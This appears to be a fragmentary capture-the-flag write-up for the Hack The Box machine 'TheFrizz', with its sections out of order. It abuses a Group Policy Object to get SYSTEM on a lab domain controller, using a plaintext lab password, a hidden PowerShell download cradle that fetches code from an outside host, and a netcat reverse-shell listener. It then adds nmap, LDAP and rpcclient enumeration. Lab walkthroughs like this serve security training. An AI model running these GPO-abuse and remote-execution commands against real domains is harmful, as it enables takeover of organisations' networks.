https://sc.vern.cc/@eggsec6/htb-thefrizz-kerberos-gpo-abuse-and-privilege-escalation-and-cve-2023-45878-d666197eb911
GPO Abuse – Edit permissions misconfiguration
python3 pygpoabuse.py 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -gpo-id "0497b08b-6dea-42fc-a3ba-7c482bf26ae6"
GPOABUSE WINDOWS:
PS C:\Users\M.SchoolBus> Get-DomainPolicy
SystemAccess : @{LSAAnonymousNameLookup=0; MaximumPasswordAge=-1; ClearTextPassword=0; PasswordComplexity=1; RequireLogonToChangePassword=0; MinimumPasswordAge=0; ForceLogoffWhenHourExpire=0; LockoutBadCount=0;
MinimumPasswordLength=0; PasswordHistorySize=0}
KerberosPolicy : @{TicketValidateClient=1; MaxServiceAge=600; MaxRenewAge=7; MaxClockSkew=5; MaxTicketAge=10}
Unicode : @{Unicode=yes}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
Version : @{Revision=1; signature="$CHICAGO$"}
PS C:\Users\M.SchoolBus> Get-NetOU
LDAP://OU=Domain Controllers,DC=frizz,DC=htb
LDAP://OU=Class_Frizz,DC=frizz,DC=htb
New-GPO -Name 'CMD'
New-GPLink -Name "CMD" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
New-GPOImmediateTask -TaskName Debugging -GPODisplayName Reverse -CommandArguments '' -Force
gpupdate
New-GPO -Name 'CMD'
New-GPLink -Name "CMD" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "CMD"
GPO-ABUSE:
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.74] from (UNKNOWN) [10.129.154.9] 53519
whoami
nt authority\system
PS C:\Windows\system32> hostname
frizzdc
PS C:\Windows\system32>
SYSTEM-SHELL !
PS C:\Users\Administrator\Desktop> whoami
nt authority\system
PS C:\Users\Administrator\Desktop> hostname
frizzdc
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/25/2025 2:06 PM 2083 cleanup.ps1
-ar--- 3/27/2025 2:40 PM 34 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
d158ce00918[REDIRECTED]
ROOT.TXT: d158ce00918[REDIRECTED]
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-24 21:06:05Z)
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ]
└─# rpcclient --user="" --command=enumdomusers -N 10.129.99.125
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ]
└─# rpcclient --user="" --command=srvinfo -N 10.129.99.125
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ]
└─# rpcclient --user="" --command=getdompwinfo -N 10.129.99.125
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
#NO PRINT=NIGHTMARE = DON'T BOTHER !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.99.125 -x -W -D "" -b "dc=frizz,dc=htb" '(objectClass=person)'
Enter LDAP Password:
# extended LDIF
#
# LDAPv3
# base <dc=frizz,dc=htb> with scope subtree
# filter: (objectClass=person)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CB6, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
#NOPE, unless authenticated user, don't bother !
445/tcp open microsoft-ds?
-No-ANON either and probably disabled NTLM authentication and required kerberos instead.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-24T21:06:10
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h08m47s